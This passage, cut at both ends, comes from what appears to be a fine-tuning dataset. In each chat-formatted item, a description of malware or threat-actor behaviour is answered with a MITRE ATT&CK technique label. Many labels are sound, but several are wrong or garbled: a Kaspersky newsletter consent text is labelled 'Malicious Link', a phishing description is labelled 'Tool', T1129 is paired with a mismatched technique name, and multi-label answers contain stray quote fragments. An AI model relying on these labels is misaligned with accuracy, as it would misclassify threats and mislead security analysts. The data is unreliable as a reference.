- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has the capability to kill any running analysis processes and AV software."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BISCUIT has a command to enumerate running processes and identify their owners."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command “net use"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman can collect the time zone information from the system."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After compromising a victim, Poseidon Group lists all running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TRITON’s TsLow python module pings controllers over the TriStation protocol."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In observed traffic these HTTP response bodies attempt to appear like benign XML related to .NET assemblies, but command data is actually spread across the many GUID and HEX strings present. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: \"\\{[0-9a-f-]{36}\\}\"||\"[0-9a-f]{32}\"||\"[0-9a-f]{16}\". Command data is spread across multiple strings that are disguised as GUID and HEX strings"
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to scan for security tools such as firewalls and antivirus tools."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "id — the generated unique identifier of the infected host - message — the Base64-encoded output from the newly created cmd.exe console process"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool that can detect the existence of remote systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proofpoint researchers frequently observe Silent Librarian’s phishing attempts originating from a university unrelated to their current target using a separate, unrelated university’s URL shortening service. This short URL links to a phishing landing page either directly or via one or more third-party sites that eventually lands the user on a clone of a login portal hosted on an actor-controlled server"
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool', 'T1598.003 - Spearphishing Link', 'T1608.005 - Link Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Action RAT can collect local data from an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has been delivered to victims via emails with malicious HTML attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has downloaded additional scripts and files from adversary-controlled servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITSAdmin tool - Win32 apps BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. Using BITS - Win32 apps Using BITS - bitsadmin examples Examples showing how to use the bitsadmin tool to perform the most common tasks. Background Intelligent Transfer Service - Win32 apps Background Intelligent Transfer Service (BITS) transfers files (downloads or uploads) between a client and server and provides progress information related to the transfers. cleanmgr Configure the Disk Cleanup tool (Cleanmgr.exe) to automatically clean up certain files. bitsadmin Reference article for the bitsadmin command, which is a command-line tool used to create, download, or upload jobs and monitor their progress"
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a module for loading and executing PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has been observed enumerating system drives and partitions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth uses a software packer called Pe123\\RPolyCryptor."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobian RAT creates an autostart Registry key to ensure persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DropBook is a Python-based backdoor compiled with PyInstaller."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has used HTTP and HTTPs for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is obfuscated using the open source ConfuserEx protector. also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aoqin Dragon obtained the Heyoka open source exfiltration tool and subsequently modified it for their operations."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Derusbi has used unencrypted HTTP on port 443 for C2."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Action RAT has the ability to collect drive and file information on an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyZBot contains functionality to collect information from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4: Given the threat actor’s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL Logs keystrokes to %userprofile%\\appdata\\roaming\\apach. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Gamaredon Group file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been observed injecting in to Explorer.exe and other processes."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepyDrive can download files to the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has been observed querying installed antivirus software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We can apply this same concept across other executable traits, such as BOOSTWRITE’s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT19 HTTP malware variant used Base64 to encode communications to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The TrickBot modules used for discovery include networkdll and psfin. TrickBot downloads modules for collecting local system information and scouting the network, primarily part of the networkdll module. This module has a battery of command line, WMI and LDAP queries to gather information, and then exfiltrate the data to GRIM SPIDER for review. The psfin module has a similar purpose but specifically searches for financial and point-of-sales indicators"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1074 - Data Staged', 'T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has sent data over HTTP if FTP failed, and has also used a fallback server."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earlier versions of UPPERCUT used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. However, in the latest version, the keys are hard-coded uniquely for each C2 address and use the C2’s calculated MD5 hash to determine which key to use, as shown in Figure 10"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used tools to encode C2 communications including Base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is written in PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Persistence Once started, the Keydnap backdoor installs a plist file in /Library/LaunchAgents/ if it has root privileges or $USER/Library/LaunchAgents/ otherwise to achieve persistence across reboots"
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In most of the samples collected by the CTU research team, Sakula maintains persistence by setting the registry Run key (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\) in either the HKLM or HKCU hive. Through 2013, registry persistence was set using standard Windows APIs. In the samples compiled in 2014, the adversary switched to adding the Run key by invoking cmd.exe"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia, Japan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT groups that now has access to the ShadowPad backdoor"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1505.003 - Server Software Component: Web Shell', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used stolen certificates to sign its malware."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Talos has identified at least three different campaigns since July 2019. It is interesting to note that this threat actor uses HTTPS on the C2. They always use self-signed certificates"
- },
- {
- "role": "assistant",
- "content": "T1587.003 - Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TG-3390 actors favor At.exe to create scheduled tasks for executing commands on remote systems"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing was run through a deployed Ubuntu container."
- },
- {
- "role": "assistant",
- "content": "T1610 - Deploy a container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Email* - - * I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above. I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The launcher then configures several Registry values, including SecurityPasswordAES, that control how the remote access tool will work"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An example of this decompressed configuration may be seen below: Figure 2 Decompressed Reaver configuration This configuration contains multiple pieces of information, including the following: Network port Sleep timer between network requests Remote Command and Control (C2) Service Name Service Description Service Display Name Hardcoded String"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has created Windows tasks to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates valid users to provide access to the system."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts C2 traffic using an RC4 key."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used Empire to find the public IP address of a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once successfully installed in a system, Trickbot will gather system information such as OS, CPU, and memory information, user accounts, lists of installed programs and services."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In many cases, additional stealers, RATs, and other malware were observed being hosted on the same web servers.Analysis of HawkEye Reborn The campaign starts with sending the aforementioned Excel sheets that exploit the well-known CVE-2017-11882 vulnerability, an arbitrary code execution bug in Microsoft Office"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain a list of active connections and open ports."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PowerShell script executes a compressed first stage PowerShell child process, which then performs a second stage PowerShell process"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mandiant assesses with moderate confidence that the threat actor obtained the session token from the operators of the info-stealer malware. These tokens were used by the actor via public VPN providers to authenticate to the target’s Microsoft 365 environment."
- },
- {
- "role": "assistant",
- "content": "T1550.004 - Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
